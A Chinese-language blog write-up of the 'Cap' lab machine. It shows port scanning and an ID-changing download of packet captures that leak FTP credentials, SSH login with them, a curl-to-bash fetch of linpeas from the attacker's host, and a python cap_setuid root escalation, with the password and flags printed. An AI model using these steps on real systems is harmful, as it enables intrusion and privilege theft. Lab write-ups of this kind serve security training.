mobile wallpaper 1mobile wallpaper 2mobile wallpaper 3mobile wallpaper 4
855 文字
2 分
Cap的writeup
2026-05-23

信息收集#

端口扫描#

使用 Nmap 对目标主机进行全端口扫描:

nmap -sC -sV -T4 -p- 10.129.2.34

参数说明:

  • -sC:使用 Nmap 默认脚本进行扫描,相当于 --script=default
  • -sV:进行服务及版本探测,识别端口上运行的服务和版本信息
  • -T4:设置扫描速度模板为 T4,速度较快,适合靶机环境
  • -p-:扫描全部 TCP 端口,即 1-65535
  • 10.129.2.34:目标主机 IP 地址

小技巧:nmap扫描的时候按空格可以查看进度

好的,写到这里的时候,nmap已经扫描完毕。

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -T4 -p- 10.129.2.34
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-22 19:42 -0400
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.62% done; ETC: 19:44 (0:00:46 remaining)
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 59.90% done; ETC: 19:44 (0:00:46 remaining)
Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.72% done; ETC: 19:47 (0:00:01 remaining)
Nmap scan report for 10.129.2.34
Host is up (0.14s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 318.51 seconds

目标的21端口是开启的,并且是ftp服务,我们可以尝试匿名登录。 22端口是ssh,版本较高,可能没有漏洞?先不考虑 80端口是http服务,我们可以尝试访问http://10.129.2.34,看有没有什么信息

尝试使用anonymous用户匿名登录ftp服务#

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.2.34 21
Connected to 10.129.2.34.
220 (vsFTPd 3.0.3)
Name (10.129.2.34:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>

失败了

GetShell#

访问http://10.129.2.34/,随便看看,知道了可能存在一个Nathan用户dirsearch也没有发现有用的信息

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.129.2.34
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/reports/http_10.129.2.34/_26-05-22_20-00-47.txt
Target: http://10.129.2.34/
[20:00:47] Starting:
[20:01:06] 302 - 208B - /data -> http://10.129.2.34/
[20:01:06] 302 - 208B - /data/adminer.php -> http://10.129.2.34/
[20:01:06] 302 - 208B - /data/autosuggest -> http://10.129.2.34/
[20:01:07] 302 - 208B - /download/history.csv -> http://10.129.2.34/
[20:01:07] 302 - 208B - /download/users.csv -> http://10.129.2.34/
Task Completed

(这里我重置了机器,靶机ip从10.129.2.34变成10.129.2.41了)

发现Security Snapshot这里有一些数据可以下载。

1.png

尝试访问http://10.129.2.41/data/0,发现可以下载其他id的数据 2.png

用wireshark打开,发现有ftp的账号和密码 3.png

用户名是nathan,密码是Buck3tH4TF0RM3!

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.2.41 21
Connected to 10.129.2.41.
220 (vsFTPd 3.0.3)
Name (10.129.2.41:kali): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48586|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 May 23 01:38 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||16491|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*************************************| 33 0.59 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.10 KiB/s)
ftp>

退出ftp后cat一下就能得到user flag了。

ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~]
└─$ cat user.txt
39c64bb9f36bb91f611e5356711b1067

尝试使用ftp的用户名和密码登录ssh,成功了。顺手看一下靶机是什么操作系统,而且我们可以看见这台靶机是64位的(x86_64)

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '10.129.2.41 (10.129.2.41)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.2.41' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
[email protected]'s password: #注意,这个地方输入密码是不会显示的,输完之后回车就可以了
nathan@cap:~$ uname -a
Linux cap 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

权限提升#

接下来我们把linpeas传到目标机器上。

┌──(kali㉿kali)-[~]
└─$ linpeas
> peass ~ Privilege Escalation Awesome Scripts SUITE
/usr/share/peass/linpeas
├── linpeas_darwin_amd64
├── linpeas_darwin_arm64
├── linpeas_fat.sh
├── linpeas_linux_386
├── linpeas_linux_amd64
├── linpeas_linux_arm
├── linpeas_linux_arm64
├── linpeas.sh
└── linpeas_small.sh

运行linpeas之后,我们的工作目录就来到了/usr/share/peass/linpeas文件夹下。这里有很多个版本的linpeas,仔细看会发现: darwin是苹果的系统,排除。 386的是给32位x86架构的,排除。 linpeas_linux_amd64,可以尝试。因为刚刚uname -a命令已经告诉我们靶机是x86-64的linux系统。但是我这里是失败了。 .sh后缀的是linux的脚本文件,我们待会用linpeas.sh

在我们的攻击机(kali)上:

┌──(kali㉿kali)-[/usr/share/peass/linpeas]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:9e:7b:1f brd ff:ff:ff:ff:ff:ff
inet 192.168.246.137/24 brd 192.168.246.255 scope global dynamic noprefixroute eth0
valid_lft 1548sec preferred_lft 1548sec
inet6 fe80::b818:7cc9:920e:3d17/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.16.16/23 brd 10.10.17.255 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::100e/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::7e6f:ca02:a0dd:10db/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever

使用ip a可以看见网络接口的信息,这里我们是要获取自己机器的ip。lo是本地回环接口,用于主机自己访问自己,地址通常是 127.0.0.1,eth0是本机的普通网络接口,用于连接本地网络/互联网,而tun0是VPN 创建的虚拟网卡,用于连接靶场内网。这里我的tun0网卡的ip是10.10.16.16

┌──(kali㉿kali)-[/usr/share/peass/linpeas]
└─$ goshs -p 80
WARNING[2026-05-22 21:59:55] There is a newer Version (v2.0.8) of goshs available. Run --update to update goshs.
__ _ ___ ___| |__ ___
/ _` |/ _ \/ __| '_ \/ __|
| (_| | (_) \__ \ | | \__ \
\__, |\___/|___/_| |_|___/
__/ |
|___/ v2.0.5
INFO [2026-05-22 21:59:55] Download embedded file at: /example.txt?embedded
INFO [2026-05-22 21:59:55] Serving on interface lo bound to 127.0.0.1:80
INFO [2026-05-22 21:59:55] Serving on interface eth0 bound to 192.168.246.137:80

goshs -p 80的作用是启动一个80端口的http文件服务器,方便我们在靶机通过wget下载文件(下载linpeas)Buck3tH4TF0RM3!

接下来在靶机上下载并执行linpeas

在靶机上:

nathan@cap:~$ curl http://10.10.14.24/linpeas.sh | bash

发现/usr/bin/python3.8有cap_setuid权限。 CAP_SETUID 是 Linux 能力(Capabilities)中的一种,用于允许进程更改其用户 ID(UID)。在传统的 UNIX 系统中,只有超级用户(root)可以执行此类操作,而通过 CAP_SETUID,普通用户也可以在特定条件下更改进程的 UID,从而实现更细粒度的权限控制。

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:/tmp$ /usr/bin/python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:/tmp# cd /root
root@cap:/root# ls
root.txt snap
root@cap:/root# cat root.txt
55d2a1c3bb39aae7c3e7396053329049
共有

この記事が役に立ったときは、ぜひ他の人に共有してください!

Cap的writeup
https://www.moegeek.org/posts/cap/
著者
ウサギ娘
公開日
2026-05-23
ライセンス
CC BY-NC-SA 4.0

一部の情報は古い可能性があります

目次